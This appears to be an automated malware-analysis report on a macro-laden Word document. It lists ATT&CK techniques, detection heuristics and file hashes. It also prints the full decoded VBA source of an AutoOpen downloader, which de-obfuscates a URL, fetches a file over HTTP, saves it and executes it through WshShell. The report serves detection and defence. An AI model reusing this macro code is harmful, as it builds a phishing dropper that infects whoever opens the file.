Verdict: MALICIOUS (Risk Score 202)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. Its AutoOpen macro calls a function that appears to download a file from the obfuscated URL "http://h7t1t7p6:c/3/bh8q730ldl6.bcco9mb/0iez25f/ay0a2cfaf.6pch8pe?0l1=bk4p8t41b22.9c1abb5" and saves it to "C:\7\4pbr2o7gbrfa6m4dda4tfa8\e2520511d0f.2j5p3g6"; both strings are stored in obfuscated form and decoded by the macro at run time. The downloaded file is then executed, indicating downloader or dropper functionality.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-8708109-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-8708109-0
- External relationship (high, OOXML_EXTERNAL_REL): External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\it.jpg
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project — VBA macros present
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the http URLs extracted from this sample are labelled "OOXML external relationship" and are standard Office schema namespace URIs.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3220 bytes | bf5856071ff0a66972aeb0b542fb49d526a2385ff959c41b5e029644bd928b3d |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ba4242f2"
Function f0b6be19()
f0b6be19 = Application.ActiveDocument.Application
End Function
Function bd8bbb5d()
bd8bbb5d = ActiveWindow.Split
End Function
Sub fb9316e2(bbc79467, c891bee4)
Dim b53313da
b53313da = FreeFile
Open bbc79467 For Output As #b53313da
Print #b53313da, d352c807(c891bee4)
Close #b53313da
End Sub
Function cd18c9d0()
cd18c9d0 = ActiveWindow.WindowState
End Function
Function c3f38880()
c3f38880 = Application.ActiveDocument.Creator
End Function
Function f453daca(dcb13349)
d13fa101 = Len(dcb13349)
For ffc41f61 = 1 To d13fa101 Step 2
fa44eb9d = fa44eb9d & Mid(dcb13349, ffc41f61, 1)
Next
f453daca = fa44eb9d
End Function
Function b3427004()
b3427004 = ActiveWindow.Selection
End Function
Function ef072479()
ef072479 = ActiveWindow.View
End Function
Sub be34d308()
End Sub
Function bc5086ba()
bc5086ba = Application.ActiveDocument.AttachedTemplate
End Function
Function c20a7730()
c20a7730 = Application.ActiveDocument.AutoSaveOn
End Function
Sub AutoOpen()
Dim d2c1fced As New a05149dc
fb9316e2 f453daca("ca:7\4pbr2o7gbrfa6m4dda4tfa8\e2520511d0f.2j5p3g6"), d2c1fced.f7f2d427(f453daca("h7t1t7p6:c/3/bh8q730ldl6.bcco9mb/0iez25f/ay0a2cfaf.6pch8pe?0l1=bk4p8t41b22.9c1abb5"))
Dim a45fb53b As New WshShell
a45fb53b.exec e117526c & " " & f453daca("ca:7\4pbr2o7gbrfa6m4dda4tfa8\e2520511d0f.2j5p3g6")
End Sub
Attribute VB_Name = "d5a96673"
Function a0f2e2ef()
a0f2e2ef = 22383
End Function
Function fc1f79ea()
fc1f79ea = ActiveWindow.DisplayScreenTips
End Function
Function d352c807(fe9b7f10)
d352c807 = StrConv(fe9b7f10, 64)
End Function
Function aef7ed93()
aef7ed93 = ActiveWindow.DisplayRulers
End Function
Function b54f2409()
b54f2409 = Application.ActiveDocument.AutoSaveOn
End Function
Function cf578a75()
End Function
Function e82a4fe6()
e82a4fe6 = ActiveWindow.Selection
End Function
Function a15f0da1(dbfafd1anp As String) As Boolean
If 883 - 26 = Len(dbfafd1anp) Then
a15f0da1 = True
End If
End Function
Function e117526c()
e117526c = f453daca("rbe3gesdv5r43724")
End Function
Attribute VB_Name = "a05149dc"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function cc5831d3()
cc5831d3 = 11930 * 1
End Function
Function e54248da()
e54248da = ActiveWindow.View
End Function
Function f7f2d427(dd8f6dee)
Dim b446aea3 As Object
Set b446aea3 = New MSXML2.XMLHTTP30
Call b446aea3.Open("GET", dd8f6dee, False)
b446aea3.Send
f7f2d427 = b446aea3.responsebody
End Function
Function c3fd99a1()
c3fd99a1 = ActiveWindow.Selection
End Function
Function c211c59f()
c211c59f = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function eaa27eb2(da69f5f9)
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 24064 bytes | abb15ae5965542a082237d2ffaa528d3636d81f81b3a59e88b7a7d67e55e4703 |